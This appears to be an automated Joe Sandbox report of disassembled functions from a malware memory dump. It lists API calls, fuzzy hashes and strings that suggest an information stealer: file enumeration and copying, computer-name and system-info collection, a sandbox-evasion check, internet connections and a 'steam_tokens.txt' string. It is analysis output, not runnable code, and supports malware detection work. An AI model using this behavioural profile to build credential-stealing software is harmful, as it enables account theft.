Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ef11959e63fecb4fc475e71dc285ef9be56765335e5eabcb4371b72175155ffb
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: ef11959e63fecb4fc475e71dc285ef9be56765335e5eabcb4371b72175155ffb
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CE2DA8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,00CE2E18), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,00CE2E48), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 6acc9d4950f632d7562efd95f79eba07f74ace0d8e2e8267b183243cac0d9f52
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 6acc9d4950f632d7562efd95f79eba07f74ace0d8e2e8267b183243cac0d9f52
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,00CE6708), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,00CE2F08), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 45b1911405f50959932c5635c2da7abb5cda1a968690181bbdcf4b642940b0d1
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 45b1911405f50959932c5635c2da7abb5cda1a968690181bbdcf4b642940b0d1
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 659e0b3ffaa1bb8b174d5301137a6f2756623223ee2fd624381752284c8d00dd
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 659e0b3ffaa1bb8b174d5301137a6f2756623223ee2fd624381752284c8d00dd
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 0f6ff80d4971acdeb155f25c940b8b4def0ef3974df047e520425ab6f8043fba
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 0f6ff80d4971acdeb155f25c940b8b4def0ef3974df047e520425ab6f8043fba
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: d74420e922cdbbe800461d53223e29431d987d3ed183b408bf3d267be02ebbc6
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: d74420e922cdbbe800461d53223e29431d987d3ed183b408bf3d267be02ebbc6
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: a0cfa2c3dc3f6bf2626717e5fe29d7357f0715d9d6aeeda083bf38022a74e031
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: a0cfa2c3dc3f6bf2626717e5fe29d7357f0715d9d6aeeda083bf38022a74e031
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 96c52ec70a096ed12a8391c14cf28217a309bffd4a42318a78b77b3f4e76c2a6
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 96c52ec70a096ed12a8391c14cf28217a309bffd4a42318a78b77b3f4e76c2a6
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
